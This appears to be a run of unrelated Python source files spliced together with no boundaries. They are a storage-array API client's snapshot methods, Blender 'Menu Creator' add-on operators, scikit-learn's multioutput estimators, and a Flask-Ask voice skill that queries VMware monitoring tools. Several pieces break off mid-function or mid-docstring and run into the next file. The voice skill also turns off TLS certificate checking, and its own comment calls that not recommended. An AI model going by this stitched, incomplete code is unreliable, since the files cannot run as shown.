offset=offset,
remote_ids=remote_ids,
remote_names=remote_names,
sort=sort,
total_only=total_only,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_replica_links_api.api20_file_system_replica_links_transfer_get_with_http_info
_process_references(references, ['ids'], kwargs)
_process_references(names_or_owners, ['names_or_owner_names'], kwargs)
_process_references(remotes, ['remote_ids', 'remote_names'], kwargs)
return self._call_api(endpoint, kwargs)
def delete_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
ids=None, # type: List[str]
names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""
Delete a file system snapshot.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
ids=ids,
names=names,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_delete_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
names_or_owners=None, # type: List[models.ReferenceType]
owners=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
destroyed=None, # type: bool
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names_or_owner_names=None, # type: List[str]
offset=None, # type: int
owner_ids=None, # type: List[str]
sort=None, # type: List[str]
total_only=None, # type: bool
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.FileSystemSnapshotGetResponse
"""
List file system snapshots.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids keyword arguments.
names_or_owners (list[FixedReference], optional):
A list of names_or_owners to query for. Overrides names_or_owner_names keyword arguments.
owners (list[FixedReference], optional):
A list of owners to query for. Overrides owner_ids keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
destroyed (bool, optional):
If set to `true`, lists only destroyed objects that are in the eradication
pending state. If set to `false`, lists only objects that are not destroyed. If
not set, lists both objects that are destroyed and those that are not destroyed.
If object name(s) are specified in the `names` parameter, then each object
referenced must exist. If `destroyed` is set to `true`, then each object
referenced must also be destroyed. If `destroyed` is set to `false`, then each
object referenced must also not be destroyed. An error is returned if any of
these conditions are not met.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names_or_owner_names (list[str], optional):
A list of resource names. Either the names of the snapshots or the owning file
systems.
offset (int, optional):
The offset of the first resource to return from a collection.
owner_ids (list[str], optional):
A list of owning file system IDs. If after filtering, there is not at least one
resource that matches each of the elements of owner IDs, then an error is
returned. This cannot be provided together with the `ids`,
`names_or_owner_names`, or `names_or_sources` query parameters.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
total_only (bool, optional):
Only return the total record for the specified items. The total record will be
the total of all items after filtering. The `items` list will be empty.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
destroyed=destroyed,
filter=filter,
ids=ids,
limit=limit,
names_or_owner_names=names_or_owner_names,
offset=offset,
owner_ids=owner_ids,
sort=sort,
total_only=total_only,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_get_with_http_info
_process_references(references, ['ids'], kwargs)
_process_references(names_or_owners, ['names_or_owner_names'], kwargs)
_process_references(owners, ['owner_ids'], kwargs)
return self._call_api(endpoint, kwargs)
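# Hedged usage sketch (added; illustrative only. How the surrounding Client object is
# constructed is an assumption, and the attribute names follow the ValidResponse
# convention used elsewhere in this client):
#
#   resp = client.get_file_system_snapshots(limit=10, destroyed=False)
#   if isinstance(resp, ValidResponse):
#       for snap in resp.items:
#           print(snap.name)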
def patch_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
file_system_snapshot=None, # type: models.FileSystemSnapshot
ids=None, # type: List[str]
latest_replica=None, # type: bool
names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.FileSystemSnapshotResponse
"""
Modify file system snapshot attributes.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
file_system_snapshot (FileSystemSnapshot, required):
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
latest_replica (bool, optional):
Used when destroying a snapshot. If not present or `false`, and the snapshot is
the latest replicated snapshot, then destroy will fail. If `true` or the
snapshot is not the latest replicated snapshot, then destroy will be successful.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
file_system_snapshot=file_system_snapshot,
ids=ids,
latest_replica=latest_replica,
names=names,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_patch_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def delete_file_system_snapshots_policies(
self,
members=None, # type: List[models.ReferenceType]
policies=None, # type: List[models.ReferenceType]
member_ids=None, # type: List[str]
member_names=None, # type: List[str]
policy_ids=None, # type: List[str]
policy_names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""
Remove snapshot scheduling policies from a file system.
Args:
members
import bpy
from . import mcdata
from .mcutils import *
from .mccolutils import *
# Operator to add the right click button on properties
class MC_AddProperty(bpy.types.Operator):
"""Add the property to the menu"""
bl_idname = "mc.add_property"
bl_label = "Add property to Menu"
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
#if hasattr(context, 'button_pointer'):
# btn = context.button_pointer
# dump(btn, 'button_pointer')
if hasattr(context, 'button_prop'):
prop = context.button_prop
#dump(prop, 'button_prop')
try:
bpy.ops.ui.copy_data_path_button(full_path=True)
except:
self.report({'WARNING'}, 'Menu Creator - Invalid selection.')
return {'FINISHED'}
rna, path = split_path(context.window_manager.clipboard)
if obj.mc_enable:
if mc_add_property_item(obj.mc_properties, [prop.name,rna,path]):
self.report({'INFO'}, 'Menu Creator - Property added to the \'' + obj.name + '\' menu.')
else:
self.report({'WARNING'}, 'Menu Creator - Property of \'' + obj.name + '\' was already added.')
else:
self.report({'ERROR'}, 'Menu Creator - Can not add property \'' + obj.name + '\'. No menu has been initialized.')
#if hasattr(context, 'button_operator'):
# op = context.button_operator
# dump(op, 'button_operator')
return {'FINISHED'}
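# Illustrative note (added): once the add-on is registered this operator is intended
# to be called from the right-click context menu of a property; invoking it directly
# would look like the hedged sketch below (it needs a button_prop in the context to
# have any effect):
#
#   bpy.ops.mc.add_property()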
# Operator to link a property to another one
class MC_LinkProperty(bpy.types.Operator):
"""Link the selected property to this one"""
bl_idname = "mc.link_property"
bl_label = "Link Property"
prop_id: bpy.props.StringProperty()
prop_path: bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
if hasattr(context, 'button_prop'):
prop = context.button_prop
#dump(prop, 'button_prop')
try:
bpy.ops.ui.copy_data_path_button(full_path=True)
except:
self.report({'WARNING'}, 'Menu Creator - Invalid selection.')
return {'FINISHED'}
rna, path = split_path(context.window_manager.clipboard)
if obj.mc_enable:
i = mc_find_index(obj.mc_properties, ['',self.prop_path,self.prop_id])
prop_type = type(eval(obj.mc_properties[i].path + '.' + obj.mc_properties[i].id))
if '].[' in rna + '.' + path:
link_type = type(eval(rna + path))
else:
link_type = type(eval(rna + '.' + path))
if prop_type == link_type:
already_added = False
for el in obj.mc_properties[i].linked_props:
if el.path == rna and el.id == path:
already_added = True
break
if not already_added:
add_item = obj.mc_properties[i].linked_props.add()
add_item.id = path
add_item.path = rna
self.report({'INFO'}, 'Menu Creator - Property \'' + path + '\' linked to \'' + obj.mc_properties[i].name + '\'')
else:
self.report({'WARNING'}, 'Menu Creator - Property \'' + path + '\' already linked to \'' + obj.mc_properties[i].name + '\'')
else:
self.report({'ERROR'}, 'Menu Creator - Property \'' + path + '\' can not be linked to \'' + obj.mc_properties[i].name + '\'')
if settings.ms_debug:
print('MenuCreator - Property \'' + path + '\' can not be linked to \'' + obj.mc_properties[i].name + '\'')
print(' Data types are ' + str(link_type) + ' and ' + str(prop_type) + '.')
else:
self.report({'ERROR'}, 'Menu Creator - Can not link property in \'' + obj.name + '\'. No menu has been initialized.')
return {'FINISHED'}
# Operator to add the collection to the selected section
class MC_AddCollection(bpy.types.Operator):
"""Add the collection to the selected section"""
bl_idname = "mc.add_collection"
bl_label = "Add collection to Menu"
section: bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
add_coll = bpy.context.collection
sec_index = mc_find_index_section(obj.mc_sections, self.section)
i=True
for el in obj.mc_sections[sec_index].collections:
if el.collection == add_coll:
i=False
break
if i:
add_item = obj.mc_sections[sec_index].collections.add()
add_item.collection = add_coll
self.report({'INFO'}, 'Menu Creator - Collection has been added to section \''+self.section+'\'.')
else:
self.report({'WARNING'}, 'Menu Creator - Collection was already added to section \''+self.section+'\'.')
return {'FINISHED'}
# Operator to clean all properties and sections from all objects
class MC_CleanAll(bpy.types.Operator):
"""Clean all the menus.\nIf you choose reset, it will also delete all Menu options from all objects"""
bl_idname = "mc.cleanprop"
bl_label = "Clean all the properties"
reset : bpy.props.BoolProperty(default=False)
def execute(self, context):
mc_clean_properties()
mc_clean_sections()
if self.reset:
for obj in bpy.data.objects:
obj.mc_enable = False
self.report({'INFO'}, 'Menu Creator - All the objects have been reset.')
return {'FINISHED'}
# Operator to clean all properties and sections from an object. If reset is on, it will also disable the menu for that object
class MC_CleanObject(bpy.types.Operator):
"""Clean all the object properties.\nIf you choose reset, it will also delete all Menu options from the object"""
bl_idname = "mc.cleanpropobj"
bl_label = "Clean the object"
reset : bpy.props.BoolProperty(default=False)
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
mc_clean_single_properties(obj)
mc_clean_single_sections(obj)
if self.reset:
obj.mc_enable = False
self.report({'INFO'}, 'Menu Creator - \'' + obj.name + '\' menu has been reset.')
return {'FINISHED'}
# Operator to remove a linked property (button in UI)
class MC_RemoveLinkedProperty(bpy.types.Operator):
"""Remove the linked property"""
bl_idname = "mc.removelinkedproperty"
bl_label = ""
prop_index : bpy.props.IntProperty()
link_path : bpy.props.StringProperty()
link_id : bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
props = obj.mc_properties
i=-1
for el in obj.mc_properties[self.prop_index].linked_props:
i=i+1
if el.path == self.link_path and el.id == self.link_id:
break
if i>=0:
obj.mc_properties[self.prop_index].linked_props.remove(i)
return {'FINISHED'}
# Single Property settings
class MC_PropertySettings(bpy.types.Operator):
"""Modify some of the property settings"""
bl_idname = "mc.propsettings"
bl_label = "Property settings"
bl_icon = "PREFERENCES"
bl_options = {'UNDO'}
name : bpy.props.StringProperty(name='Name',
description="Choose the name of the property")
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
icon : bpy.props.EnumProperty(name='Icon',
description="Choose the icon.\nNote that the icon name MUST respect Blender convention. All the icons can be found in the Icon Viewer default Blender addon.",items=mcdata.mc_icon_list)
section : bpy.props.EnumProperty(name='Section',
description="Choose the section of the property",items=mc_section_list)
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
i = mc_find_index(obj.mc_properties,[self.name,self.path,self.id])
if i>=0:
obj.mc_properties[i].name = self.name
obj.mc_properties[i].icon = self.icon
obj.mc_properties[i].section = self.section
return {'FINISHED'}
def invoke(self, context, event):
settings = bpy.context.scene.mc_settings
if settings.ms_debug:
return context.window_manager.invoke_props_dialog(self, width=650)
else:
return context.window_manager.invoke_props_dialog(self, width=550)
def draw(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
i = mc_find_index(obj.mc_properties,[self.name,self.path,self.id])
layout = self.layout
layout.prop(self, "name")
layout.prop(self, "icon")
layout.prop(self, "section")
layout.separator()
layout.label(text="Property info", icon="INFO")
box = layout.box()
box.label(text="Identifier: "+self.id)
if settings.ms_debug:
layout.label(text="Full path", icon="RNA")
box = layout.box()
box.label(text=self.path+'.'+self.id)
if len(obj.mc_properties[i].linked_props)>0:
layout.separator()
layout.label(text="Linked Properties", icon="LINKED")
box = layout.box()
for prop in obj.mc_properties[i].linked_props:
row = box.row()
row.label(text=prop.path + '.' + prop.id, icon="DOT")
link_del_op = row.operator(MC_RemoveLinkedProperty.bl_idname, icon="X")
link_del_op.prop_index = i
link_del_op.link_id = prop.id
link_del_op.link_path = prop.path
# Swap Properties Operator
class MC_SwapProperty(bpy.types.Operator):
"""Change the position of the property"""
bl_idname = "mc.swapprops"
bl_label = "Change the property position"
mod : bpy.props.BoolProperty(default=False) # False = down, True = Up
name : bpy.props.StringProperty()
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
col = sorted(obj.mc_properties, key = mc_prop_ID)
col_len = mc_len_collection(col)
i = mc_find_index(col,[self.name,self.path,self.id])
if i>=0:
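# Look for the nearest property in the same section and swap the two mc_id
# ordering values: mod=True walks backwards (move the property up),
# mod=False walks forwards (move it down).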
if self.mod:
j=i
while j>0:
j = j - 1
if col[j].section==col[i].section:
break
if j>-1:
col[i].mc_id = j
col[j].mc_id = i
else:
j=i
while j<col_len-1:
j=j+1
if col[j].section==col[i].section:
break
if j<col_len:
col[i].mc_id = j
col[j].mc_id = i
return {'FINISHED'}
# Operator to remove a property (button in UI)
class MC_RemoveProperty(bpy.types.Operator):
"""Remove the property from the current menu"""
bl_idname = "mc.removeproperty"
bl_label = "Remove the property"
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
props = obj.mc_properties
mc_remove_property_item(obj.mc_properties,['',self.path,self.id])
return {'FINISHED'}
# Operator to add a new section
class MC_AddSection(bpy.types.Operator):
"""Add a new section to the section list."""
bl_idname = "mc.addsection"
bl_label = "Add section"
bl_icon = "PREFERENCES"
bl_options = {'UNDO'}
name : bpy.props.StringProperty(name='Name',
description="Choose the name of the section", default = "Section")
icon : bpy.props.EnumProperty(name='Icon',
description="Choose the icon.\nNote that the icon name MUST respect Blender convention. All the icons can be found in the Icon Viewer default Blender addon",items=mcdata.mc_icon_list)
collapsable : bpy.props.BoolProperty(name="Collapsable",
description="Add a collapse button near the name of the section")
type : bpy.props.EnumProperty(name='Type',
description="Choose the section type",items=mcdata.mc_section_type_list)
"""
This module implements multioutput regression and classification.
The estimators provided in this module are meta-estimators: they require
a base estimator to be provided in their constructor. The meta-estimator
extends single output estimators to multioutput estimators.
"""
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
# Author: <NAME>
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import numpy as np
import scipy.sparse as sp
from joblib import Parallel, delayed
from abc import ABCMeta, abstractmethod
from .base import BaseEstimator, clone, MetaEstimatorMixin
from .base import RegressorMixin, ClassifierMixin, is_classifier
from .model_selection import cross_val_predict
from .utils import check_array, check_X_y, check_random_state
from .utils.metaestimators import if_delegate_has_method
from .utils.validation import (check_is_fitted, has_fit_parameter,
_check_fit_params, _deprecate_positional_args)
from .utils.multiclass import check_classification_targets
from .utils import deprecated
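# Minimal usage sketch of the meta-estimators defined below (illustration only,
# not part of the original module; Ridge is just an example base estimator):
#
#   from sklearn.linear_model import Ridge
#   from sklearn.multioutput import MultiOutputRegressor
#   X = [[1., 2.], [3., 4.], [5., 6.]]
#   y = [[1., 10.], [2., 20.], [3., 30.]]   # two target columns -> two wrapped Ridges
#   MultiOutputRegressor(Ridge()).fit(X, y).predict(X)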
__all__ = ["MultiOutputRegressor", "MultiOutputClassifier",
"ClassifierChain", "RegressorChain"]
def _fit_estimator(estimator, X, y, sample_weight=None, **fit_params):
estimator = clone(estimator)
if sample_weight is not None:
estimator.fit(X, y, sample_weight=sample_weight, **fit_params)
else:
estimator.fit(X, y, **fit_params)
return estimator
def _partial_fit_estimator(estimator, X, y, classes=None, sample_weight=None,
first_time=True):
if first_time:
estimator = clone(estimator)
if sample_weight is not None:
if classes is not None:
estimator.partial_fit(X, y, classes=classes,
sample_weight=sample_weight)
else:
estimator.partial_fit(X, y, sample_weight=sample_weight)
else:
if classes is not None:
estimator.partial_fit(X, y, classes=classes)
else:
estimator.partial_fit(X, y)
return estimator
class _MultiOutputEstimator(BaseEstimator, MetaEstimatorMixin,
metaclass=ABCMeta):
@abstractmethod
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
self.estimator = estimator
self.n_jobs = n_jobs
@if_delegate_has_method('estimator')
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incrementally fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets.
classes : list of numpy arrays, shape (n_outputs)
Each array is unique classes for one output in str/int
Can be obtained via
``[np.unique(y[:, i]) for i in range(y.shape[1])]``, where y is the
target matrix of the entire dataset.
This argument is required for the first call to partial_fit
and can be omitted in the subsequent calls.
Note that y doesn't need to contain all labels in `classes`.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
Returns
-------
self : object
"""
X, y = check_X_y(X, y,
multi_output=True,
accept_sparse=True)
if y.ndim == 1:
raise ValueError("y must have at least two dimensions for "
"multi-output regression but has only one.")
if (sample_weight is not None and
not has_fit_parameter(self.estimator, 'sample_weight')):
raise ValueError("Underlying estimator does not support"
" sample weights.")
first_time = not hasattr(self, 'estimators_')
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_partial_fit_estimator)(
self.estimators_[i] if not first_time else self.estimator,
X, y[:, i],
classes[i] if classes is not None else None,
sample_weight, first_time) for i in range(y.shape[1]))
return self
def fit(self, X, y, sample_weight=None, **fit_params):
""" Fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets. An indicator matrix turns on multilabel
estimation.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
**fit_params : dict of string -> object
Parameters passed to the ``estimator.fit`` method of each step.
Returns
-------
self : object
"""
if not hasattr(self.estimator, "fit"):
raise ValueError("The base estimator should implement"
" a fit method")
X, y = self._validate_data(X, y, multi_output=True, accept_sparse=True)
if is_classifier(self):
check_classification_targets(y)
if y.ndim == 1:
raise ValueError("y must have at least two dimensions for "
"multi-output regression but has only one.")
if (sample_weight is not None and
not has_fit_parameter(self.estimator, 'sample_weight')):
raise ValueError("Underlying estimator does not support"
" sample weights.")
fit_params_validated = _check_fit_params(X, fit_params)
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_estimator)(
self.estimator, X, y[:, i], sample_weight,
**fit_params_validated)
for i in range(y.shape[1]))
return self
def predict(self, X):
"""Predict multi-output variable using a model
trained for each target variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
Returns
-------
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets predicted across multiple predictors.
Note: Separate models are generated for each predictor.
"""
check_is_fitted(self)
if not hasattr(self.estimator, "predict"):
raise ValueError("The base estimator should implement"
" a predict method")
X = check_array(X, accept_sparse=True)
y = Parallel(n_jobs=self.n_jobs)(
delayed(e.predict)(X)
for e in self.estimators_)
return np.asarray(y).T
def _more_tags(self):
return {'multioutput_only': True}
class MultiOutputRegressor(RegressorMixin, _MultiOutputEstimator):
"""Multi target regression
This strategy consists of fitting one regressor per target. This is a
simple strategy for extending regressors that do not natively support
multi-target regression.
.. versionadded:: 0.18
Parameters
----------
estimator : estimator object
An estimator object implementing :term:`fit` and :term:`predict`.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for :meth:`fit`.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
When individual estimators are fast to train or predict
using `n_jobs>1` can result in slower performance due
to the overhead of spawning processes.
.. versionchanged:: v0.20
`n_jobs` default changed from 1 to None
Attributes
----------
estimators_ : list of ``n_output`` estimators
Estimators used for predictions.
Examples
--------
>>> import numpy as np
>>> from sklearn.datasets import load_linnerud
>>> from sklearn.multioutput import MultiOutputRegressor
>>> from sklearn.linear_model import Ridge
>>> X, y = load_linnerud(return_X_y=True)
>>> clf = MultiOutputRegressor(Ridge(random_state=123)).fit(X, y)
>>> clf.predict(X[[0]])
array([[176..., 35..., 57...]])
"""
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
super().__init__(estimator, n_jobs=n_jobs)
@if_delegate_has_method('estimator')
def partial_fit(self, X, y, sample_weight=None):
"""Incrementally fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
Returns
-------
self : object
"""
return super().partial_fit(X, y, sample_weight=sample_weight)
class MultiOutputClassifier(ClassifierMixin, _MultiOutputEstimator):
"""Multi target classification
This strategy consists of fitting one classifier per target. This is a
simple strategy for extending classifiers that do not natively support
multi-target classification
Parameters
----------
estimator : estimator object
An estimator object implementing :term:`fit`, :term:`score` and
:term:`predict_proba`.
n_jobs : int or None, optional (default=None)
The number of jobs to use for the computation.
It does each target variable in y in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
.. versionchanged:: v0.20
`n_jobs` default changed from 1 to None
Attributes
----------
classes_ : array, shape = (n_classes,)
Class labels.
estimators_ : list of ``n_output`` estimators
Estimators used for predictions.
Examples
--------
>>> import numpy as np
>>> from sklearn.datasets import make_multilabel_classification
>>> from sklearn.multioutput import MultiOutputClassifier
>>> from sklearn.neighbors import KNeighborsClassifier
>>> X, y = make_multilabel_classification(n_classes=3, random_state=0)
>>> clf = MultiOutputClassifier(KNeighborsClassifier()).fit(X, y)
>>> clf.predict(X[-2:])
array([[1, 1, 0], [1, 1, 1]])
"""
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
super().__init__(estimator, n_jobs=n_jobs)
def fit(self, X, Y, sample_weight=None, **fit_params):
"""Fit the model to data matrix X and targets Y.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input data.
Y : array-like of shape (n_samples, n_classes)
The target values.
sample_weight : array-like of shape (n_samples,) or None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying classifier supports sample
weights.
**fit_params : dict of string -> object
Parameters passed to the ``estimator.fit`` method of each step.
Returns
-------
self : object
"""
super().fit(X, Y, sample_weight, **fit_params)
self.classes_ = [estimator.classes_ for estimator in self.estimators_]
return self
@property
def predict_proba(self):
"""Probability estimates.
Returns prediction probabilities for each class of each output.
This method will raise a ``ValueError`` if any of the
estimators do not have ``predict_proba``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data
Returns
-------
p : array of shape (n_samples, n_classes), or a list of n_outputs \
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute :term:`classes_`.
.. versionchanged:: 0.19
This function now returns a list of arrays where the length of
the list is ``n_outputs``, and each array is (``n_samples``,
``n_classes``) for that particular output.
#!/usr/bin/python
# vrobbie.py
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is intially via credentials set. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed will result in error during request due to cert check
# flip this flag to False to bypass certificate checking in those cases. I have suppressed the warning
# normally thrown by urllib3 but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
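# NOTE: datacenter_report() loops forever, rewriting prefetch/dcreport every 5 minutes.
# It is presumably started on a background Thread (imported above) rather than called
# inline, e.g. Thread(target=datacenter_report).start()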
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
